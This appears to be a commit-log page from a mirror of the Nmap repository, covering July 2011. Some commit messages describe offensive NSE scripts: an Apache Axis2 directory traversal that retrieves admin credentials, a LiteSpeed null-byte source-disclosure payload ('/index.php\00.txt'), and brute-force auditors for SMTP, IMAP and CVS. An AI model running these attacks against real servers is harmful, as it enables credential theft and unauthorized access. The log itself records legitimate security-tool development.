PenTest/nmap
1
0
Fork 0
mirror of https://github.com/nmap/nmap.git synced 2025-12-20 22:49:01 +00:00
Code Issues Projects Releases Wiki Activity
5,872 Commits 2 Branches 0 Tags
d2bce72beeefea796e264aa46fd38c9db359e45c
Commit Graph

5872 Commits

This Branch
This Branch
All Branches
Author SHA1 Message Date
paulino
d4054187e4 Adds http-axis2-dir-traversal: 
http-axis2-dir-traversal exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter <code>xsd</code> (OSVDB-59001). By default it will try to retrieve the configuration file of the Axis2 service <code>'/conf/axis2.xml'</code> using the path <code>'/axis2/services/'</code> to return the username and password of the admin account.
 2011-07-24 21:10:04 +00:00
paulino
c43e0bb970 Added http-litespeed-sourcecode-download: 
http-litespeed-sourcecode-download.nse exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script's source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).

If the server is not vulnerable it returns an error 400. If index.php is not found, you may try /phpinfo.php which is also shipped with LiteSpeed Web Server. The attack payload looks like this:
* <code>/index.php\00.txt</code>

References:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2333
* http://www.exploit-db.com/exploits/13850/
 2011-07-24 20:13:42 +00:00
shinnok
e2fcc14fe2 Update my TODO file. 2011-07-22 21:55:18 +00:00
shinnok
a83e27c0fb Update CHANGELOG with the Ncat blocking ssl handshakes fix. 2011-07-22 21:43:24 +00:00
djalal
bd6d08232d Added the '--script-help' option to the Nmap usage. 2011-07-22 10:59:07 +00:00
batrick
4d27d83f62 Fix to make SCRIPT_NAME not have a filename extension in certain situations. 
See [1].

[1] http://seclists.org/nmap-dev/2011/q3/304
 2011-07-21 18:26:11 +00:00
batrick
9d7ce06a96 better error message when script fails to load (now includes traceback of the script) 2011-07-21 17:46:16 +00:00
patrik
cbf959aecc o [NSE] Added the script broadcast-dhcp-discover that sends a DHCP discover 
message to the broadcast address and collects and reports the network
  information received from the DHCP server. [Patrik]
 2011-07-21 11:56:15 +00:00
patrik
29c973befa Add imap-brute as I missed it in the earlier commit [Patrik] 2011-07-21 10:04:30 +00:00
patrik
ee7e069e63 o [NSE] Added the script smtp-brute that performs brute force password 
auditing against SMTP servers. [Patrik]

o [NSE] Updated SMTP library to support authentication using both plain-text
  and the SASL library. [Patrik]
 2011-07-21 06:16:20 +00:00
patrik
0453f89779 o [NSE] Added the script imap-brute that performs brute force password 
auditing against IMAP servers. [Patrik]

o [NSE] Updated IMAP library to support authentication using both plain-text
  and the SASL library. [Patrik]
 2011-07-21 06:14:02 +00:00
patrik
222e8b9e42 o [NSE] Added SASL library created by Djalal Harouni and Patrik Karlsson 
providing common code for "Simple Authentication and Security Layer" to
  services supporting it. The algorithms supported by the library are:
  PLAIN, CRAM-MD5, DIGEST-MD5 and NTLM. [Patrik Karlsson, Djalal Harouni]
 2011-07-21 06:07:02 +00:00
patrik
c3f94727ad o [NSE] Added scripts cvs-brute.nse, cvs-brute-repository.nse and the cvs 
library. The cvs-brute-repository script allows for guessing possible
  repository names needed in order to perform password guessing using the
  cvs-brute.nse script. [Patrik]
 2011-07-21 06:01:19 +00:00
patrik
2faca7aed1 Added support for scripts to report invalid (non-existing) accounts back 
to the brute library. This way, they're removed from further guessing.
[Patrik]
 2011-07-21 05:56:58 +00:00
fyodor
4c03e43d2f Fix a typo in category name 2011-07-21 05:12:33 +00:00
weilin
586b8464b2 Reverted the unintended changes on nselib/packet.lua@25009. 2011-07-21 02:32:47 +00:00
colin
fd59f6f8d2 Updated changelog with zenmap crash reporter changes 2011-07-20 19:18:53 +00:00
weilin
e889dead91 o Added IPv6 Neighbor Discovery ping. This is the IPv6 analog to IPv4 
ARP scan. It is the default ping type for local IPv6 networks.
 2011-07-20 08:29:02 +00:00
david
c32d196ce2 Remove the nonexistent include/config.h from the build configuration. 
With this present, the project always appeared out of date. Visual C++
would always prompt to rebuild the project when starting to debug, for
example.
 2011-07-20 07:16:05 +00:00
david
6cf428d8c6 Fix some "and" -> "&&". 2011-07-19 23:42:33 +00:00
david
1646813162 Whitespace and formatting in osscan.cc. 2011-07-19 22:00:13 +00:00
david
9a64d66a1e Clarify an ambiguous if/else. 2011-07-19 21:40:32 +00:00
david
75cd409ba5 Fix some [-Wunused-but-set-variable] warnings. 2011-07-19 21:40:32 +00:00
fyodor
532eab87e7 Add a small bug/misfeature task 2011-07-19 18:55:03 +00:00
weilin
1dcf652410 Added ND ping for local IPv6 nets, merging from /nmap-exp/weilin/nmap-nd. 2011-07-19 02:31:54 +00:00
fyodor
737035118a Note some done stuff 2011-07-19 02:06:39 +00:00
david
e2bb7cc271 Fix an indexing bug in http-vhosts.nse. Found by Daniel Miller. 2011-07-18 20:44:22 +00:00
david
bbf254d90e Fix incorrect (broken) return value in p2p-conficker.nse. Spotted by 
Daniel Miller.
 2011-07-18 20:40:47 +00:00
david
f57b87a010 Capitalization in service probe. 2011-07-18 16:29:40 +00:00
david
6d371adee8 Formatting. 2011-07-18 16:29:38 +00:00
david
a2314b2041 Add port 9050, tor-socks, to the portrule for socks-open-proxy.nse. 2011-07-18 16:29:37 +00:00
djalal
01f4cdd83e o [NSE] Small improvements on the smtp-vuln-cve2011-1764 script: 
- Check the port.version.product in the portrule to see if it matches
    the 'Exim smtpd'
  - If the script was not able to confirm the vulnerability but the Exim
    version is between 4.70 and 4.75, then report: "LIKELY VULNERABLE".
 2011-07-18 11:42:41 +00:00
djalal
2c7cad079b o [NSE] Added smtp-vuln-cve2011-1764 script, which checks the Exim DKIM 
Format String vulnerability (CVE-2011-1764).
 2011-07-18 10:21:01 +00:00
djalal
cc062e2e1e o [NSE] Remove the mac-geolocation script entries since the it was deleted. 
- Update the script.db file.
  - Add the script name to the 'OLD_SCRIPT_NAMES' variable in the Makefile.in file.
 2011-07-18 09:58:50 +00:00
djalal
30bd1681b0 o [NSE] Made the following scripts in the default category: 
giop-info.nse
  vnc-info.nse
  ncp-serverinfo.nse
  afp-serverinfo.nse
 2011-07-18 09:50:18 +00:00
gorjan
1f9479a161 Removing the mac-geolocation script which used the no longer available Google Geolocation API service 2011-07-17 17:26:59 +00:00
gorjan
d780448af7 Updating the script to use an API key supplied by the user throught the script-args. 2011-07-17 17:22:58 +00:00
paulino
8215c3420f Fixes the way of creating the request line by changing string.format for regular string concatenation to allow null bytes in the requests. 2011-07-15 23:48:00 +00:00
paulino
deded46038 Adds apache axis2 login signature. 2011-07-15 23:43:10 +00:00
paulino
6a8a10794f Adds more paths for Coldfusion and Apache Axis2 2011-07-15 23:33:03 +00:00
djalal
ce11504eff Updated my TODO file. 2011-07-15 16:46:12 +00:00
patrik
4356fe16a5 * fixed a bug that would result in unnecessary connects and disconnect for 
discovered accounts

* documented engine options

* added new engine option (nostore) that instructs the library not to store
  the discovered credentials in the credential database
 2011-07-13 20:49:20 +00:00
patrik
c800c437a9 added check for unknown account state to avoid crash when retrieving accounts. 2011-07-13 20:46:15 +00:00
shinnok
e91c17f7a9 Add a new task in my TODO file and note a completed one. 2011-07-13 17:55:24 +00:00
gorjan
9b7d310355 Adding the broadcast-ping script. 2011-07-13 09:38:40 +00:00
gorjan
70b09c9598 Small fix: missed an 'end' 2011-07-13 09:34:19 +00:00
gorjan
c08ca750fa Added default values for the index and length parameters if no value is supplied in the Packet:raw(index,length) function of the nselib/packet.lua library 2011-07-13 09:27:54 +00:00
gorjan
5f3b402cf7 Putting back the old snmp-brute untill I'm finished writing the new one 2011-07-12 23:25:57 +00:00
patrik
aadac7c8d5 * Fixed a bug in the brute library prevented additional passwords from 
being found if run in passonly mode.

* Fixed a bug in the brute library preventing detection of duplicate
  credential entries requested from the iterator.
 2011-07-12 21:23:12 +00:00
patrik
23d2e0d31f o [NSE] Applied patch from Chris Woodbury that adds the following additional 
information to the output of smb-os-discovery:
  + Forest name
  + FQDN
  + NetBIOS computer name
  + NetBIOS domain name
 2011-07-12 06:08:43 +00:00